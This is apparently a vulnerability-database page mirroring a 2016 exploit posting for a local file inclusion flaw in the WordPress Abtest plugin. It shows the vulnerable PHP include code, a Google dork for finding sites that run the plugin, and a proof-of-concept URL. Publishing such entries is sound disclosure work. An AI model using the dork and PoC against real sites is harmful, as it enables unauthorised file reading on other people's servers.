Lucene search
K

WordPress Abtest Plugin- Local File Inclusion

🗓️ 21 Mar 2016 00:00:00Reported by CrashBandicotType 
zdt
 zdt
🔗 0day.today👁 17 Views

WordPress Abtest Plugin- Local File Inclusion, Vulnerable File: abtest_admin.ph

Code
# Exploit Title: Wordpress Plugin Abtest - Local File Inclusion
# Date: 2016-03-19
# Google Dork : inurl:/wp-content/plugins/abtest/
# Exploit Author: CrashBandicot
# Vendor Homepage: https://github.com/wp-plugins/abtest
# Tested on: Chrome
   
 
# Vulnerable File : abtest_admin.php
  
<?php 
 
require 'admin/functions.php'; 
 
if (isset($_GET['action'])) {
 
  include 'admin/' . $_GET['action'] . '.php';
 
} else {
   
   include 'admin/list_experiments.php'; 
}
?>
 
# PoC : localhost/wp-content/plugins/abtest/abtest_admin.php?action=[LFI]
  
# Pics : http://i.imgur.com/jZFKYOc.png

#  0day.today [2018-03-13]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation